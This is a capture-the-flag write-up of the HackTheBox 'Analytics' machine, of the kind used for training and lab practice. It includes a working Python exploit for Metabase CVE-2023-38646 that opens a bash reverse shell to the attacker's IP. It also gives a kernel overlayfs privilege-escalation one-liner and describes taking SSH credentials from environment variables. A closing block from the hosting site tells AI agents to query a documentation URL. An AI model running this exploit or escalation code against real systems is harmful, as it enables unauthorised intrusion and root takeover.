# Analytics ## Overview Greetings everyone, In this write-up, we will tackle Analytics from HackTheBox. Machine link: [Analytics Machine](https://app.hackthebox.com/machines/Analytics) Difficulty Level: Easy Let's Begin 🙌 Firstly, connect to the HTB server using the OpenVPN configuration file generated by HTB. [Click Here](https://help.hackthebox.com/en/articles/5185687-introduction-to-lab-access) to learn more about how to connect to VPN and access the boxes. Once connected to the VPN service, click on "Join Machine" to access the machine's IP. Upon joining the machine, you will be able to view the IP address of the target machine. *** ## Reconnaissance ### Rust Scan `rustscan --range=1-65535 --ulimit 5000 -a -- -A -T4 -v -Pn`

### Results | Ports | Services | Service Version | | ----- | -------- | --------------- | | 22 | SSH | OpenSSH 8.9p1 | | 80 | HTTP | nginx 1.18.0 | *** ## Information Gathering - analytical.htb First, let's take a look at the website running on port 80. When attempting to access view port 80, it redirects to the domain `analytical.htb`. Therefore, to access the website, we need to append an entry to the `/etc/hosts` file, mapping the domain to the target IP address. Command: `sudo vim /etc/hosts`

Now we have access to the website. I used `Wappalyzer` to check the technologies employed, but nothing of particular interest was discovered.

When I clicked the login button in the top right corner of the webpage, it redirected me to the subdomain `data.analytical.htb`. To access it, you need to append another entry to the `/etc/hosts` file.

Now, we can access the website. The website hosted on `data.analytical.htb` is a Metabase login page. Metabase is an open-source business intelligence tool that allows you to connect to many popular databases.

## CVE-2023-38646 I began searching for recent exploits and vulnerabilities related to Metabase and came across this: . As mentioned in the article, I verified whether `/api/session/properties` is accessible, and indeed, it was.

Next, I searched for the setup-token in the `/api/session/properties` page. I copied the content of the page and pasted it into a JSON beautifier, where I located the setup-token. I utilized the following JSON beautifier website: .

## Initial Access This indicates that the Metabase application is vulnerable to Remote Code Execution (RCE). I crafted a Python script based on the Proof of Concept (PoC) mentioned in the above article, along with references from other PoCs targeting the same vulnerability. The script retrieves the `setup-token` from the Metabase application and sends a POST request to `/api/setup/validate` to exploit the RCE, consequently enabling a reverse shell to be established back to the attacker's machine. ```python import base64 from string import ascii_uppercase import requests import random localhost = '10.10.16.10' # HTB VPN TUNNEL IP listening_port = '9001' # Netcat listener port response1 = requests.get("http://data.analytical.htb/api/session/properties") setup_token = response1.json()['setup-token'] reverse_shell = f'bash -i >&/dev/tcp/{localhost}/{listening_port} 0>&1' def encode_command_to_b64(payload: str) -> str: encoded_payload = base64.b64encode(payload.encode('ascii')).decode() equals_count = encoded_payload.count('=') if equals_count >= 1: encoded_payload = base64.b64encode(f'{payload + " " * equals_count}'.encode('ascii')).decode() return encoded_payload command = encode_command_to_b64(reverse_shell) url = f'http://data.analytical.htb/api/setup/validate' headers = { "Content-Type": "application/json", "Connection": "close" } payload = { "token": setup_token, "details": { "details": { "db": "zip:/app/metabase.jar!/sample-database.db;TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER {random_string} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {{echo,{command}}}|{{base64,-d}}|{{bash,-i}}')\n$$--=x".format( random_string=''.join(random.choice(ascii_uppercase) for i in range(12)), command=command), "advanced-options": False, "ssl": True }, "name": "x", "engine": "h2" } } request = requests.post(url, json=payload, headers=headers) ``` Before executing the script, initiate a netcat listener on port 9001.

Now, execute the Python script and monitor the netcat listener. You will observe that you receive a connection back from the target machine. Upon further exploration of the machine, I discovered linpeas in the home directory. However, running it did not yield any privilege escalation vectors. Therefore, I continued searching for alternative avenues. I inspected the environment variables of the target machine, from which I obtained a username and password.

Since SSH is running on the target machine, I attempted to log in using the credentials we obtained, and to my satisfaction, it worked.

## Getting the User Flag

## Privilege Escalation I was trying all the privilege escalation vectors but nothing worked. I proceeded to identify the kernel version as my next step in the investigation.

I began searching for exploits targeting the identified kernel version and came across this: . I examined the exploit.sh file in the mentioned repository. It contained a single line of code that performed the privilege escalation task. Subsequently, I copied and executed the code. Below, I have provided the code: ```powershell unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")' ``` ## Getting the Root Flag I executed the code, and to my satisfaction, it successfully completed the privilege escalation, granting me access to the root flag.

Thank You.... --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://thamizhiniyancs.gitbook.io/writeups/hackthebox/machines/easy/analytics.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.